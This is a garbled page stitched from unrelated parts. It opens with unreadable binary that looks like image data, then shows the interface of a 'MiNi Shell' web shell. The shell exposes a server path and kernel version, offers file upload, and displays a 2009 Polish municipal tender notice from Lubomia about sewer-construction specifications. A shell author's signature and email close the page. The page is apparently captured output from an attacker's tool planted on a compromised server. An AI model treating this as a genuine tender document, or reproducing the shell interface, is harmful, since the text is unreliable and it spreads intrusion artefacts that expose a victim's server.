JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/2980-N-2009.html

<p class="kh_header"><b>Lubomia: Pomoc Techniczna na przygotowanie SIWZ dla
Kontraktu nr II i III oraz wniosku o dofinansowanie</b><br>
<b>Numer ogłoszenia: 2980 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubomia , ul. Szkolna 1, 44-360 Lubomia, woj. śląskie, tel. 032 4516614/ 4516128, faks 032 4516614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lubomia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pomoc Techniczna na przygotowanie SIWZ dla
Kontraktu nr II i III oraz wniosku o dofinansowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi wykonanie usługi: Pomoc Techniczna na przygotowanie  SIWZ dla Kontraktu nr II i III oraz wniosku o dofinansowanie

Zakres usługi obejmuje:

1) 	Przygotowanie Specyfikacji Istotnych Warunków Zamówienia dla Kontraktu nr II, obejmującego budowę kanalizacji sanitarnej w sołectwie Syrynia, według formuły projektuj i buduj, tj. według Warunków Kontraktowych dla Urządzeń oraz Projektowania i Budowy FIDIC (tzw. żółta książka) wraz z ogłoszeniem oraz Programem Funkcjonalno-Użytkowym z elementami Projektu Budowlanego.
2)	Przygotowanie koncepcji programowo-przestrzennej budowy sieci kanalizacji sanitarnej na terenie sołectwa Nowe Nieboczowy.
3)	Przygotowanie Specyfikacji Istotnych Warunków Zamówienia dla Kontraktu nr III, obejmującego budowę kanalizacji sanitarnej w sołectwie Nowe Nieboczowy, według formuły projektuj i buduj, tj. według Warunków Kontraktowych dla Urządzeń oraz Projektowania i Budowy FIDIC (tzw. żółta książka) wraz z ogłoszeniem oraz Programem Funkcjonalno-Użytkowym z elementami Projektu Budowlanego.
4)	Przygotowanie kompletu dokumentów i pozyskanie w imieniu Zamawiającej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia dla zakresu przedsięwzięcia objętego Kontraktem nr II i Kontraktem nr III.
5)	Przygotowanie wniosku o dofinansowanie wraz z kompletem załączników.

Zakres zamówienia związany z Pomocą Techniczną stanowi również:

o Wsparcie dla Zamawiającej na etapie postępowania mającego na celu wybór Wykonawców Robót dla Kontraktu nr II i III (udzielanie odpowiedzi na pytania Wykonawców)
o Wsparcie dla Zamawiającej,Beneficjenta w pozyskiwaniu środków na realizację zadania - udział w spotkaniach z instytucjami zarządzającymi, udzielanie odpowiedzi na pytania instytucji, wprowadzanie wymaganych korekt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.31.80.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 10000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu, a także przedłożyć wymagane dokumenty, potwierdzające spełnianie tych warunków:
1)Posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)Nie podlegać wykluczeniu z postępowania na podstawie art. 24 ust.1 pkt.2 u.p.z.p. 
3)Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.  
4)Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. 
5)Złożyć oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ, o spełnianiu warunków udziału w postępowaniu .
6. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ,w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, każdy z nich musi złożyć przedmiotowe dokumenty,
2. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 UPZP wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Informację z KRK muszą złożyć odpowiednio: przedsiębiorca w przypadku osób fizycznych, wspólnik w przypadku spółek jawnych, partner lub członek zarządu w przypadku spółek partnerskich, komplementariusz w przypadku spółek komandytowych oraz spółek komandytowo-akcyjnych, urzędujący członek organu zarządzającego w przypadku osób prawnych,
4.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 UPZP wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ,dotyczy informacji o orzeczeniu przez sąd zakazu ubiegania się o zamówienie przez podmioty zbiorowe, wydanym na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary,
5.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu niniejszego zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności, sporządzony według wzoru stanowiącego załącznik nr 3 do  SIWZ; 
6.Kopie decyzji o przyznaniu uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie oraz kopie aktualnego zaświadczenia o przynależności ww. osoby do właściwej Izby samorządu zawodowego.
7.Wykaz wykonanych zamówień  sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ wraz  z dokumentami, ze zadania te zostały wykonane należycie potwierdzających, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał;
-co najmniej jedno zamówienie polegające na wykonaniu programu funkcjonalno-użytkowego (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr. 202, poz. 2072 z dnia 16 września 2004r., z późn. zm.) dla sieci,systemów kanalizacji sanitarnej o długości sieci co najmniej 40,0 km.
- co najmniej 2 dokumentacje przetargowe Specyfikacje Istotnych Warunków Zamówienia dotyczące robót z zakresu budowy sieci kanalizacji sanitarnej o wartości co najmniej 40 mln PLN bez podatku VATkażda, związane z gospodarką wodno-ściekową. 
-  co najmniej jedno zamówienie polegające na wykonaniu koncepcji programowo-przestrzennej dla sieci, systemów kanalizacji sanitarnej o długości sieci co najmniej 20,0 km.
- co najmniej 1 raport oddziaływania na środowisko dla przedsięwzięć współfinansowanych z krajowych lub regionalnych programów operacyjnych dla robót związanych z gospodarką wodno-ściekowa o wartości co najmniej 40 mln PLN netto bez podatku VAT
- co najmniej 1 wniosek o dofinansowanie ze środków unijnych dla inwestycji gospodarka wodno-ściekowa o wartości robót co najmniej 40 mln PLN netto bez podatku VAT, pozytywnie zaopiniowany w trakcie oceny merytorycznej I stopnia w naborze wniosków organizowanych przez instytucje wdrażające
8.Polisa lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej o wartości co najmniej 200 000 PLN w zakresie prowadzonej działalności gospodarczej związanej z wykonanie niniejszego zamówienia,
9.Kopia umowy konsorcjum stanowi załącznik do Umowy zawartej w wyniku przeprowadzenia niniejszego postępowania, zgodnie z zapisami Wzoru Umowy. Umowa ta nie może być zmieniana bez uprzedniej pisemnej zgody Zamawiającego.
Stosownie do treści par. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku 
w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane:
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1.nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2.nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3.nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty, mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy. Ponadto, dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę lub upełnomocnionego przedstawiciela wykonawcy.
Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubomia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lubomia
ul. Szkolna 1
44-360 Lubomia.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2009 godzina 09:30, miejsce: Urząd Gminy Lubomia 
ul. Szkolna 1
44-360 Lubomia.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com